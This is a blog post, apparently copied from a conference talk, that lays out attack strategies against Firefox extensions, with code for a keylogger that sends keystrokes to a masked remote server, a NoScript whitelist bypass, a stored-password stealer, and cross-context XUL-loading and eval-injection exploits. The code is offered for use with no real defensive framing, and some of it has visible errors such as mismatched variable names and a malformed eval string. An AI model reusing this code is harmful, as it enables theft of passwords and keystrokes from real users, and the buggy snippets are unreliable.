Thursday, April 14, 2011

Mozilla Firefox Strategies Mozilla Keylogger

Here are some of the highlights

 
Key Logger
We can create a simple key logger by just using event listener which will record all keystrokes and then use XMLHTTP request to a remote site. The point to note here is that extensions don’t follow single origin policy thus an extension that records a password from your banking site can send it to a malicious site.
document.addEventListener("keypress", onkey,false);
var keys='';
function onkey(e){
keyss+=String.fromCharCode(e.charCode);
if (keys.length>20){
http=new XMLHttpRequest();
url = "http://***********.com/prasannak/ler****.php?keylog="+keyss+"\n";
http.open("GET",url,false);
http.send(null);
keyss='';
No-Script Bypass
We will use XPCOM classes and components to add a malicious site to no-script white list which will effectively  render no-script protection useless?
let Sub_btn = {
  onCommand: function(event) {

var perfs = Components.classes["@mozilla.org/preferences-service;1"].
                  getService(Components.interfaces.nsIPrefService);
perfs = perfs.getBranch("capability.policy.maonoscript.");
perfs.setCharPref("sites", "default noscript whitelisted sites + -iblocked.com");
Password Stealer
We will use XPCOM classes and components to build a Firefox stored password stealer.Code:-
let HelloWorld = {
  onCommand: function(event) {
var l2m = Components.classes["@mozilla.org/login-manager;1"].
                  getService(Components.interfaces.nsILoginManager);
alltheinfo = l2m.getAllLogins({});
for (i=0; I<=alltheinfo.length;i=i+1){
alert(alltheinfo[i].password)
}
  }
};
These were some of the sample malicious scripts that were scripted using basic and legal functions approved by Mozilla to produce some very malicious extensions. The malicious extensions are limited only to the imagination of a malicious creator.

Cross Context Switching (XCS)
The attack (xcs) was first found by “pdp”. This was found against an extension called sage. XCS involves a concept of making malicious code moving from one realm to the other, like a code in the website being executed by the resident extension. A major harm caused by such an attack would be that a user could be compromised by just visiting the web location.

Attacking DOM & Event Handlers
Event handlers implement the properties attributes and behavior of an element. When a DOM element is dragged and drooped it takes with it the attributes properties and behavior with it. This could be a maliciously used if an extension code trusted the code that was dropped by a malicious DOM element.

CreateEvent() could be used to send custom events which could also include the extensions itself.  In this example we will create an extension which listens for customs events and does certain activity like loading a dynamic XUL.

This could be exploited by a malicious user by making the user go to a page controlled by him which has code create a custom event to send the location of the malicious XUL hosted by him.

The extension on receiving the event loads the Malicious XUL from an arbiter location and as the XUL file now runs as part of Chrome it is free to do any malicious activity like the ones discussed in the previous section “Malicious Extensions”

As of Firefox version 3.5 “loadoverlay ” function does not take “http” based Xul requests but does allow XUL from “Chrome:\\”. Though this fixes the problem of a malicious user loading malicious content from internet but the threat of loading malicious XUL from a Map Drive still exists.

Extension XUL Code

<script>
  var customExtension = {
  customListener: function(evt) {
  document.loadOverlay(evt.target.getAttribute("url"), null);
  }
  }
document.addEventListener("CustomEvent", function(e) {
customExtension.customListener(e); }, false, true);
</script>
Malicious Web Location Code
<html>
<head>
<title>Test</title>
<script>
var element = document.createElement("CustomExtensionDataElement");
element.setAttribute("url", "chrome://hellooworld/content/q1.xul");
document.documentElement.appendChild(element);
var evt = document.createEvent("Events");
evt.initEvent("CustomEvent", true,false);
element.dispatchEvent(evt);
</script>
</head>
<body>
<p>
This Test Page </p>
</body>
</htmL>
Bypassing Wrappers
Multiple wrappers exist within Mozilla framework that acts as firewalls segregating the code from different zones. A developer, for ease of use could bypass these firewalls thus compromising the Firefox eco-system to malicious XCS attacks.

We will create a Firefox extension that bypasses such a wrapper using the “wrappedJSObject” to access variables in the document Zone and use this content in the privileged chrome zone. The extension developer uses another potentially vulnerable function “eval()”. He grabs the content from document and runs it through eval() in the chrome zone which allow a malicious user to inject malicious JavaScript code that will be executed by the eval function.
Code:-

Extension Code
function Test_Function()
{
    test = my_message
    if (test==null)
    {
      alert("Wrapper Exists")
    }
    else{
    alert(test);
    trim = window.content.wrappedJSObject.my_message1
    eval(trim);
    }
}
Malicious Website Code
<html>
<head>
<title>Test</title>
<script>
var dir= "123";
my_message1="eval("eval(dirService = Components.classes['@mozilla.org/file/directory_service;1'].getService(Components.interfaces.nsIProperties);))eval( homeDirFile = dirService.get('Home', Components.interfaces.nsIFile);) eval(homeDir = homeDirFile.path;) eval(alert(homeDir);))"))"
</script>
</head>
<body>
<p>
This Test Page </p>
</body>
</htmL>
Filed Under :

5 comments for "Mozilla Firefox Strategies Mozilla Keylogger"

  1. Awesome Post man .. I got this Concept very use full .. Tested and working.. Apart from this i Like to ask you Have Worked on BHO ..
    BHO may be help to spading our installer or a message like samy(samy's worm is not on BHO) did ..

    ReplyDelete
  2. copied from
    Mozilla Firefox Internals, Building Extensions & Attack Strategies
    Prasanna Kanagasabai

    atleast give credit

    ReplyDelete
  3. Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome Awesome

    ReplyDelete

background